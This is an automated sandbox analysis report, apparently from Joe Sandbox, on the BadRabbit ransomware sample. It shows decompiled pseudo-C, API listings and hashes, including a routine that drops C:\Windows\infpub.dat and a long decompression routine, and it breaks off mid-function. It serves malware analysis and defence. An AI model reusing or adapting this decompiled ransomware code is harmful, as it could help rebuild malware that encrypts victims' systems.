                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 000D10A4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.303040427.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                  • Associated: 00000009.00000002.303032103.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303059119.00000000000D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303073243.00000000000D9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_d0000_Endermanch@BadRabbit.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$File$CloseProcess$AllocateChangeCreateFindFreeHandleNotificationReadSize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 631125692-0
                                                                                                                                                  • Opcode ID: b310e9206ef08ea6fc66628741e1f4e2307285466410e7da70c22112b6a6fecc
                                                                                                                                                  • Instruction ID: 72d3c01e859d31583ee0df9ace3efcf77a157f65a382577d02ccd525c83bdf6f
                                                                                                                                                  • Opcode Fuzzy Hash: b310e9206ef08ea6fc66628741e1f4e2307285466410e7da70c22112b6a6fecc
                                                                                                                                                  • Instruction Fuzzy Hash: 62214F72602314BBD730ABA5AC4CF9BBFACEB49762F104156FE49D2250DA758940CBB0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 70 d1260-d1282 CreateFileW 71 d12aa-d12af 70->71 72 d1284-d1297 WriteFile 70->72 73 d1299-d129c 72->73 74 d12a3-d12a4 FindCloseChangeNotification 72->74 73->74 75 d129e 73->75 74->71 75->74
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E000D1260(long __ebx, long _a4) {
                                                                                                                                                  				void* _t4;
                                                                                                                                                  				int _t7;
                                                                                                                                                  				struct _OVERLAPPED* _t11;
                                                                                                                                                  				void* _t12;
                                                                                                                                                  
                                                                                                                                                  				_t11 = 0;
                                                                                                                                                  				_t4 = CreateFileW(L"C:\\Windows\\infpub.dat", 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                  				_t12 = _t4;
                                                                                                                                                  				if(_t12 != 0xffffffff) {
                                                                                                                                                  					_t7 = WriteFile(_t12, _a4, __ebx,  &_a4, 0); // executed
                                                                                                                                                  					if(_t7 != 0 && _a4 == __ebx) {
                                                                                                                                                  						_t11 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					FindCloseChangeNotification(_t12); // executed
                                                                                                                                                  				}
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}







                                                                                                                                                  0x000d1265
                                                                                                                                                  0x000d1277
                                                                                                                                                  0x000d127d
                                                                                                                                                  0x000d1282
                                                                                                                                                  0x000d128f
                                                                                                                                                  0x000d1297
                                                                                                                                                  0x000d129e
                                                                                                                                                  0x000d129e
                                                                                                                                                  0x000d12a4
                                                                                                                                                  0x000d12a4
                                                                                                                                                  0x000d12af

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,000D13F0,?,?,?), ref: 000D1277
                                                                                                                                                  • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,000D13F0,?,?,?), ref: 000D128F
                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,000D13F0,?,?,?), ref: 000D12A4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.303040427.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                  • Associated: 00000009.00000002.303032103.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303059119.00000000000D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303073243.00000000000D9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_d0000_Endermanch@BadRabbit.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                  • String ID: C:\Windows\infpub.dat
                                                                                                                                                  • API String ID: 3805958096-2284094909
                                                                                                                                                  • Opcode ID: 1f73808e60872c6daa7db13c9e778d2e737f6bc8b96ad23e71a3bd36dd7a25c3
                                                                                                                                                  • Instruction ID: 2d96f7142cfb223f0d1416edf72f7a814c4afccda8d5cd2e3ba418029ad85db4
                                                                                                                                                  • Opcode Fuzzy Hash: 1f73808e60872c6daa7db13c9e778d2e737f6bc8b96ad23e71a3bd36dd7a25c3
                                                                                                                                                  • Instruction Fuzzy Hash: FBF08C76A022147BE7201A56EC4CFEB3E6CDBC6BA1F00812AFE04C6280DA758D41C2B0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 115 d3393-d33a5 malloc
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E000D3393(signed int _a8, signed int _a12) {
                                                                                                                                                  				void* _t5;
                                                                                                                                                  
                                                                                                                                                  				_t5 = malloc(_a8 * _a12); // executed
                                                                                                                                                  				return _t5;
                                                                                                                                                  			}




                                                                                                                                                  0x000d339e
                                                                                                                                                  0x000d33a5

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.303040427.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                  • Associated: 00000009.00000002.303032103.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303059119.00000000000D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303073243.00000000000D9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_d0000_Endermanch@BadRabbit.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: malloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                  • Opcode ID: e556b537d4fe67859f682bc138546e7994fb1432b70124257811653e42ab8f21
                                                                                                                                                  • Instruction ID: e60ade7e8ab2b7b64bc862abf9059ea91fd58b46fb47c031bb594bb02a86445e
                                                                                                                                                  • Opcode Fuzzy Hash: e556b537d4fe67859f682bc138546e7994fb1432b70124257811653e42ab8f21
                                                                                                                                                  • Instruction Fuzzy Hash: 06B0123314834D6B9F04EED9E987CDA73DCEB54620B844407F91C8F642DD31F5104668
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                  			E000D201D(signed int* __ebx, signed int __ecx, unsigned int __edx, signed int __edi, signed char** __esi) {
                                                                                                                                                  				signed int _t753;
                                                                                                                                                  				signed int _t785;
                                                                                                                                                  				signed int _t787;
                                                                                                                                                  				signed int _t792;
                                                                                                                                                  				signed int _t793;
                                                                                                                                                  				signed int _t796;
                                                                                                                                                  				signed int _t800;
                                                                                                                                                  				signed int* _t920;
                                                                                                                                                  				signed int _t928;
                                                                                                                                                  				signed int _t935;
                                                                                                                                                  				void* _t940;
                                                                                                                                                  				unsigned int _t1054;
                                                                                                                                                  				signed int _t1055;
                                                                                                                                                  				signed int _t1056;
                                                                                                                                                  				signed int _t1060;
                                                                                                                                                  				signed int _t1103;
                                                                                                                                                  				intOrPtr _t1105;
                                                                                                                                                  				signed int _t1106;
                                                                                                                                                  				signed char** _t1125;
                                                                                                                                                  				signed char** _t1127;
                                                                                                                                                  				void* _t1164;
                                                                                                                                                  
                                                                                                                                                  				L0:
                                                                                                                                                  				while(1) {
                                                                                                                                                  					L0:
                                                                                                                                                  					_t1125 = __esi;
                                                                                                                                                  					_t1103 = __edi;
                                                                                                                                                  					_t1054 = __edx;
                                                                                                                                                  					_t928 = __ecx;
                                                                                                                                                  					_t920 = __ebx;
                                                                                                                                                  					if(__edi >= 0xe) {
                                                                                                                                                  						goto L180;
                                                                                                                                                  					}
                                                                                                                                                  					L177:
                                                                                                                                                  					__eax =  *(__ebp - 8);
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L178:
                                                                                                                                                  						if(__ecx == 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						L179:
                                                                                                                                                  						__eax =  *__eax & 0x000000ff;
                                                                                                                                                  						 *(__ebp - 4) = __ecx;
                                                                                                                                                  						__ecx = __edi;
                                                                                                                                                  						__eax = __eax << __cl;
                                                                                                                                                  						__edi = __edi + 8;
                                                                                                                                                  						__ecx =  *(__ebp - 4);
                                                                                                                                                  						__edx = __edx + __eax;
                                                                                                                                                  						__eax =  *(__ebp - 8);
                                                                                                                                                  						__eax =  *(__ebp - 8) + 1;
                                                                                                                                                  						 *(__ebp - 0xc) = __edx;
                                                                                                                                                  						 *(__ebp - 8) = __eax;
                                                                                                                                                  						if(__edi < 0xe) {
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						goto L180;
                                                                                                                                                  					}
                                                                                                                                                  					L322:
                                                                                                                                                  					_t935 =  *(_t1164 - 4);
                                                                                                                                                  					L323:
                                                                                                                                                  					_t1127 =  *(_t1164 + 8);
                                                                                                                                                  					_t1127[3] =  *(_t1164 - 0x1c);
                                                                                                                                                  					_t1127[4] =  *(_t1164 - 0x18);
                                                                                                                                                  					_t1060 = 0;
                                                                                                                                                  					 *_t1127 =  *(_t1164 - 8);
                                                                                                                                                  					_t1127[1] = _t935;
                                                                                                                                                  					_t920[0xf] = _t1103;
                                                                                                                                                  					_t1105 =  *((intOrPtr*)(_t1164 - 0x28));
                                                                                                                                                  					_t920[0xe] =  *(_t1164 - 0xc);
                                                                                                                                                  					if(_t920[0xa] != 0) {
                                                                                                                                                  						L328:
                                                                                                                                                  						_t785 = E000D2DCB(_t1127, _t1127[3], _t1105 - _t1127[4]);
                                                                                                                                                  						if(_t785 == 0) {
                                                                                                                                                  							L331:
                                                                                                                                                  							_t1060 = 0;
                                                                                                                                                  							L332:
                                                                                                                                                  							_t787 =  *(_t1164 - 0x38) - _t1127[1];
                                                                                                                                                  							_t1106 = _t1105 - _t1127[4];
                                                                                                                                                  							_t1127[2] =  &(_t1127[2][_t787]);
                                                                                                                                                  							_t1127[5] =  &(_t1127[5][_t1106]);
                                                                                                                                                  							_t920[7] = _t920[7] + _t1106;
                                                                                                                                                  							 *(_t1164 - 0x38) = _t787;
                                                                                                                                                  							if(_t920[2] != _t1060) {
                                                                                                                                                  								if(_t1106 != 0) {
                                                                                                                                                  									_push(_t1106);
                                                                                                                                                  									_push(_t1127[3] - _t1106);
                                                                                                                                                  									_push(_t920[6]);
                                                                                                                                                  									if(_t920[4] == _t1060) {
                                                                                                                                                  										_t796 = E000D2E91();
                                                                                                                                                  									} else {
                                                                                                                                                  										_t796 = E000D30C1();
                                                                                                                                                  									}
                                                                                                                                                  									_t920[6] = _t796;
                                                                                                                                                  									_t1060 = 0;
                                                                                                                                                  									_t1127[0xc] = _t796;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							if( *_t920 == 0x13) {
                                                                                                                                                  								L340:
                                                                                                                                                  								_t1060 = 0x100;
                                                                                                                                                  								goto L341;
                                                                                                                                                  							} else {
                                                                                                                                                  								L339:
                                                                                                                                                  								if( *_t920 != 0xe) {
                                                                                                                                                  									L341:
                                                                                                                                                  									 *(_t1164 + 8) = 0x80;
                                                                                                                                                  									asm("sbb ecx, ecx");
                                                                                                                                                  									_t789 =  ==  ?  *(_t1164 + 8) : 0;
                                                                                                                                                  									_t790 = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060;
                                                                                                                                                  									_t791 = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060 + _t920[0xf];
                                                                                                                                                  									_t1127[0xb] = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060 + _t920[0xf];
                                                                                                                                                  									if( *(_t1164 - 0x38) != 0) {
                                                                                                                                                  										L343:
                                                                                                                                                  										if( *((intOrPtr*)(_t1164 + 0xc)) != 4) {
                                                                                                                                                  											L345:
                                                                                                                                                  											_t792 =  *(_t1164 - 0x20);
                                                                                                                                                  											L138:
                                                                                                                                                  											return _t792;
                                                                                                                                                  										}
                                                                                                                                                  										L344:
                                                                                                                                                  										_t793 =  *(_t1164 - 0x20);
                                                                                                                                                  										_t940 = 0xfffffffb;
                                                                                                                                                  										_t792 =  ==  ? _t940 : _t793;
                                                                                                                                                  										goto L138;
                                                                                                                                                  									}
                                                                                                                                                  									L342:
                                                                                                                                                  									if(_t1106 == 0) {
                                                                                                                                                  										goto L344;
                                                                                                                                                  									}
                                                                                                                                                  									goto L343;
                                                                                                                                                  								}
                                                                                                                                                  								goto L340;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						L329:
                                                                                                                                                  						 *_t920 = 0x1e;
                                                                                                                                                  						L330:
                                                                                                                                                  						_push(0xfffffffc);
                                                                                                                                                  						L137:
                                                                                                                                                  						_pop(_t792);
                                                                                                                                                  						goto L138;
                                                                                                                                                  					}
                                                                                                                                                  					L324:
                                                                                                                                                  					if(_t1105 == _t1127[4]) {
                                                                                                                                                  						goto L332;
                                                                                                                                                  					}
                                                                                                                                                  					L325:
                                                                                                                                                  					if( *_t920 >= 0x1d) {
                                                                                                                                                  						goto L332;
                                                                                                                                                  					}
                                                                                                                                                  					L326:
                                                                                                                                                  					if( *_t920 < 0x1a) {
                                                                                                                                                  						goto L328;
                                                                                                                                                  					}
                                                                                                                                                  					L327:
                                                                                                                                                  					if( *((intOrPtr*)(_t1164 + 0xc)) == 4) {
                                                                                                                                                  						goto L332;
                                                                                                                                                  					}
                                                                                                                                                  					goto L328;
                                                                                                                                                  					L180:
                                                                                                                                                  					_t1103 = _t1103 - 0xe;
                                                                                                                                                  					_t1055 = _t1054 >> 5;
                                                                                                                                                  					 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  					_t920[0x18] = (_t1054 & 0x0000001f) + 0x101;
                                                                                                                                                  					_t1056 = _t1055 >> 5;
                                                                                                                                                  					_t920[0x19] = (_t1055 & 0x0000001f) + 1;
                                                                                                                                                  					_t1054 = _t1056 >> 4;
                                                                                                                                                  					 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  					_t920[0x17] = (_t1056 & 0x0000000f) + 4;
                                                                                                                                                  					if(_t920[0x18] > 0x11e) {
                                                                                                                                                  						L183:
                                                                                                                                                  						_t1125[6] = "too many length or distance symbols";
                                                                                                                                                  						L31:
                                                                                                                                                  						 *_t920 = 0x1d;
                                                                                                                                                  						while(1) {
                                                                                                                                                  							L135:
                                                                                                                                                  							_t753 =  *_t920;
                                                                                                                                                  							if(_t753 > 0x1e) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							L1:
                                                                                                                                                  							switch( *((intOrPtr*)(_t753 * 4 +  &M000D2B54))) {
                                                                                                                                                  								case 0:
                                                                                                                                                  									L2:
                                                                                                                                                  									if(_t920[2] != 0) {
                                                                                                                                                  										L4:
                                                                                                                                                  										_push(0x10);
                                                                                                                                                  										_pop(_t763);
                                                                                                                                                  										__eflags = _t1103 - _t763;
                                                                                                                                                  										if(_t1103 >= _t763) {
                                                                                                                                                  											L8:
                                                                                                                                                  											__eflags = _t920[2] & 0x00000002;
                                                                                                                                                  											if((_t920[2] & 0x00000002) == 0) {
                                                                                                                                                  												L11:
                                                                                                                                                  												_t920[4] = _t920[4] & 0x00000000;
                                                                                                                                                  												_t764 = _t920[8];
                                                                                                                                                  												__eflags = _t764;
                                                                                                                                                  												if(_t764 != 0) {
                                                                                                                                                  													_t25 = _t764 + 0x30;
                                                                                                                                                  													 *_t25 =  *(_t764 + 0x30) | 0xffffffff;
                                                                                                                                                  													__eflags =  *_t25;
                                                                                                                                                  												}
                                                                                                                                                  												L13:
                                                                                                                                                  												__eflags = _t920[2] & 0x00000001;
                                                                                                                                                  												if((_t920[2] & 0x00000001) == 0) {
                                                                                                                                                  													L24:
                                                                                                                                                  													_t1125[6] = "incorrect header check";
                                                                                                                                                  													goto L17;
                                                                                                                                                  												}
                                                                                                                                                  												L14:
                                                                                                                                                  												_t767 = (_t1054 >> 8) + ((_t1054 & 0x000000ff) << 8);
                                                                                                                                                  												_push(0x1f);
                                                                                                                                                  												_pop(_t931);
                                                                                                                                                  												__eflags = _t767 % _t931;
                                                                                                                                                  												_t1054 =  *(_t1164 - 0xc);
                                                                                                                                                  												if(_t767 % _t931 != 0) {
                                                                                                                                                  													goto L24;
                                                                                                                                                  												}
                                                                                                                                                  												L15:
                                                                                                                                                  												__eflags = (_t1054 & 0x0000000f) - 8;
                                                                                                                                                  												if((_t1054 & 0x0000000f) == 8) {
                                                                                                                                                  													L18:
                                                                                                                                                  													_t1054 = _t1054 >> 4;
                                                                                                                                                  													_t1103 = _t1103 - 4;
                                                                                                                                                  													 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  													 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  													_t934 = (_t1054 & 0x0000000f) + 8;
                                                                                                                                                  													__eflags = _t920[9];
                                                                                                                                                  													if(_t920[9] != 0) {
                                                                                                                                                  														L22:
                                                                                                                                                  														__eflags = _t934 - _t920[9];
                                                                                                                                                  														if(_t934 <= _t920[9]) {
                                                                                                                                                  															goto L20;
                                                                                                                                                  														} else {
                                                                                                                                                  															_t1125[6] = "invalid window size";
                                                                                                                                                  															goto L17;
                                                                                                                                                  														}
                                                                                                                                                  													} else {
                                                                                                                                                  														_t920[9] = _t934;
                                                                                                                                                  														L20:
                                                                                                                                                  														_t1103 = 0;
                                                                                                                                                  														_t920[5] = 1 << _t934;
                                                                                                                                                  														_t774 = E000D2E91(0, 0, 0);
                                                                                                                                                  														_t920[6] = _t774;
                                                                                                                                                  														_t1125[0xc] = _t774;
                                                                                                                                                  														_t1065 =  !( *(_t1164 - 0xc) >> 8) & 0x00000002 | 0x00000009;
                                                                                                                                                  														__eflags = _t1065;
                                                                                                                                                  														 *_t920 = _t1065;
                                                                                                                                                  														_t1054 = 0;
                                                                                                                                                  														goto L21;
                                                                                                                                                  													}
                                                                                                                                                  												} else {
                                                                                                                                                  													_t1125[6] = "unknown compression method";
                                                                                                                                                  													goto L17;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											L9:
                                                                                                                                                  											__eflags = _t1054 - 0x8b1f;
                                                                                                                                                  											if(_t1054 != 0x8b1f) {
                                                                                                                                                  												goto L11;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t1103 = 0;
                                                                                                                                                  												_t920[6] = E000D30C1(0, 0, 0);
                                                                                                                                                  												_push(0x1f);
                                                                                                                                                  												_pop(_t776);
                                                                                                                                                  												 *((char*)(_t1164 - 0x14)) = _t776;
                                                                                                                                                  												 *((char*)(_t1164 - 0x13)) = 0x8b;
                                                                                                                                                  												_t778 = E000D30C1(_t920[6], _t1164 - 0x14, 2);
                                                                                                                                                  												_t1054 = 0;
                                                                                                                                                  												_t920[6] = _t778;
                                                                                                                                                  												 *(_t1164 - 0xc) = 0;
                                                                                                                                                  												 *(_t1164 - 0x10) = 0;
                                                                                                                                                  												 *_t920 = 1;
                                                                                                                                                  												goto L134;
                                                                                                                                                  											}
                                                                                                                                                  										} else {
                                                                                                                                                  											_t779 =  *(_t1164 - 8);
                                                                                                                                                  											while(1) {
                                                                                                                                                  												L6:
                                                                                                                                                  												__eflags = _t928;
                                                                                                                                                  												if(_t928 == 0) {
                                                                                                                                                  													goto L322;
                                                                                                                                                  												}
                                                                                                                                                  												L7:
                                                                                                                                                  												 *(_t1164 - 4) = _t928 - 1;
                                                                                                                                                  												_t798 = ( *_t779 & 0x000000ff) << _t1103;
                                                                                                                                                  												_t1103 = _t1103 + 8;
                                                                                                                                                  												_t928 =  *(_t1164 - 4);
                                                                                                                                                  												_t1054 = _t1054 + _t798;
                                                                                                                                                  												_t779 =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                  												 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                  												 *(_t1164 - 8) = _t779;
                                                                                                                                                  												 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                  												__eflags = _t1103 - 0x10;
                                                                                                                                                  												if(_t1103 < 0x10) {
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  												goto L8;
                                                                                                                                                  											}
                                                                                                                                                  											goto L322;
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										 *_t920 = 0xc;
                                                                                                                                                  										goto L135;
                                                                                                                                                  									}
                                                                                                                                                  								case 1:
                                                                                                                                                  									L25:
                                                                                                                                                  									_push(0x10);
                                                                                                                                                  									_pop(__eax);
                                                                                                                                                  									__eflags = __edi - __eax;
                                                                                                                                                  									if(__edi >= __eax) {
                                                                                                                                                  										L29:
                                                                                                                                                  										__ebx[4] = __edx;
                                                                                                                                                  										__eflags = __dl - 8;
                                                                                                                                                  										if(__dl == 8) {
                                                                                                                                                  											L32:
                                                                                                                                                  											__eflags = __edx & 0x0000e000;
                                                                                                                                                  											if((__edx & 0x0000e000) == 0) {
                                                                                                                                                  												L34:
                                                                                                                                                  												__ecx = __ebx[8];
                                                                                                                                                  												__eflags = __ecx;
                                                                                                                                                  												if(__ecx != 0) {
                                                                                                                                                  													__edx = __edx >> 8;
                                                                                                                                                  													__eax = __edx >> 0x00000008 & 0x00000001;
                                                                                                                                                  													__eflags = __eax;
                                                                                                                                                  													 *__ecx = __eax;
                                                                                                                                                  												}
                                                                                                                                                  												__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                  												if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                  													 *(__ebp - 0x14) = __dl;
                                                                                                                                                  													__eax = __ebp - 0x14;
                                                                                                                                                  													__eflags = __edx;
                                                                                                                                                  													 *(__ebp - 0x13) = __dl;
                                                                                                                                                  													__ebx[6] = E000D30C1(__ebx[6], __ebp - 0x14, 2);
                                                                                                                                                  												}
                                                                                                                                                  												__ecx =  *(__ebp - 4);
                                                                                                                                                  												__eax = 0;
                                                                                                                                                  												__eflags = 0;
                                                                                                                                                  												__edx = 0;
                                                                                                                                                  												 *__ebx = 2;
                                                                                                                                                  												 *(__ebp - 0xc) = 0;
                                                                                                                                                  												__edi = 0;
                                                                                                                                                  												goto L39;
                                                                                                                                                  											}
                                                                                                                                                  											L33:
                                                                                                                                                  											 *(__esi + 0x18) = "unknown header flags set";
                                                                                                                                                  										} else {
                                                                                                                                                  											 *(__esi + 0x18) = "unknown compression method";
                                                                                                                                                  										}
                                                                                                                                                  										goto L31;
                                                                                                                                                  									} else {
                                                                                                                                                  										__eax =  *(__ebp - 8);
                                                                                                                                                  										while(1) {
                                                                                                                                                  											L27:
                                                                                                                                                  											__eflags = __ecx;
                                                                                                                                                  											if(__ecx == 0) {
                                                                                                                                                  												goto L322;
                                                                                                                                                  											}
                                                                                                                                                  											L28:
                                                                                                                                                  											__eax =  *__eax & 0x000000ff;
                                                                                                                                                  											 *(__ebp - 4) = __ecx;
                                                                                                                                                  											__ecx = __edi;
                                                                                                                                                  											__eax = __eax << __cl;
                                                                                                                                                  											__edi = __edi + 8;
                                                                                                                                                  											__ecx =  *(__ebp - 4);
                                                                                                                                                  											__edx = __edx + __eax;
                                                                                                                                                  											__eax =  *(__ebp - 8);
                                                                                                                                                  											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                  											 *(__ebp - 0xc) = __edx;
                                                                                                                                                  											 *(__ebp - 8) = __eax;
                                                                                                                                                  											 *(__ebp - 0x10) = __edi;
                                                                                                                                                  											__eflags = __edi - 0x10;
                                                                                                                                                  											if(__edi < 0x10) {
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											goto L29;
                                                                                                                                                  										}
                                                                                                                                                  										goto L322;
                                                                                                                                                  									}
                                                                                                                                                  								case 2:
                                                                                                                                                  									L39:
                                                                                                                                                  									__eflags = __edi - 0x20;
                                                                                                                                                  									if(__edi >= 0x20) {
                                                                                                                                                  										L43:
                                                                                                                                                  										__eax = __ebx[8];
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 *(__eax + 4) = __edx;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                  										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                  											__eax = __edx;
                                                                                                                                                  											 *(__ebp - 0x14) = __dl;
                                                                                                                                                  											__eax = __edx >> 8;
                                                                                                                                                  											 *(__ebp - 0x13) = __al;
                                                                                                                                                  											__edx = __edx >> 0x10;
                                                                                                                                                  											 *(__ebp - 0x12) = __al;
                                                                                                                                                  											__eax = __ebp - 0x14;
                                                                                                                                                  											__eflags = __edx;
                                                                                                                                                  											 *(__ebp - 0x11) = __dl;
                                                                                                                                                  											__ebx[6] = E000D30C1(__ebx[6], __ebp - 0x14, 4);
                                                                                                                                                  										}
                                                                                                                                                  										__ecx =  *(__ebp - 4);
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										 *__ebx = 3;
                                                                                                                                                  										 *(__ebp - 0xc) = 0;
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										goto L48;
                                                                                                                                                  									}
                                                                                                                                                  									L40:
                                                                                                                                                  									__eax =  *(__ebp - 8);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L41:
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L322;
                                                                                                                                                  										}
                                                                                                                                                  										L42:
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										 *(__ebp - 4) = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx =  *(__ebp - 4);
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax =  *(__ebp - 8);
                                                                                                                                                  										__eax =  *(__ebp - 8) + 1;
                                                                                                                                                  										 *(__ebp - 0xc) = __edx;
                                                                                                                                                  										 *(__ebp - 8) = __eax;
                                                                                                                                                  										__eflags = __edi - 0x20;
                                                                                                                                                  										if(__edi < 0x20) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L43;
                                                                                                                                                  									}
                                                                                                                                                  									goto L322;
                                                                                                                                                  								case 3:
                                                                                                                                                  									L48:
                                                                                                                                                  									_push(0x10);
                                                                                                                                                  									_pop(__eax);
                                                                                                                                                  									__eflags = __edi - __eax;
                                                                                                                                                  									if(__edi >= __eax) {
                                                                                                                                                  										L52:
                                                                                                                                                  										__ecx = __ebx[8];
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx != 0) {
                                                                                                                                                  											__eax = __dl & 0x000000ff;
                                                                                                                                                  											 *(__ecx + 8) = __dl & 0x000000ff;
                                                                                                                                                  											__ecx = __edx;
                                                                                                                                                  											__eax = __ebx[8];
                                                                                                                                                  											__ecx = __edx >> 8;
                                                                                                                                                  											__eflags = __ecx;
                                                                                                                                                  											 *(__ebx[8] + 0xc) = __ecx;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                  										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                  											 *(__ebp - 0x14) = __dl;
                                                                                                                                                  											__eax = __ebp - 0x14;
                                                                                                                                                  											__eflags = __edx;
                                                                                                                                                  											 *(__ebp - 0x13) = __dl;
                                                                                                                                                  											__ebx[6] = E000D30C1(__ebx[6], __ebp - 0x14, 2);
                                                                                                                                                  										}
                                                                                                                                                  										__ecx =  *(__ebp - 4);
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										__edx = 0;
                                                                                                                                                  										 *__ebx = 4;
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										 *(__ebp - 0xc) = 0;
                                                                                                                                                  										 *(__ebp - 0x10) = 0;
                                                                                                                                                  										goto L57;
                                                                                                                                                  									}
                                                                                                                                                  									L49:
                                                                                                                                                  									__eax =  *(__ebp - 8);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L50:
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L322;
                                                                                                                                                  										}
                                                                                                                                                  										L51:
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										 *(__ebp - 4) = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx =  *(__ebp - 4);
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax =  *(__ebp - 8);
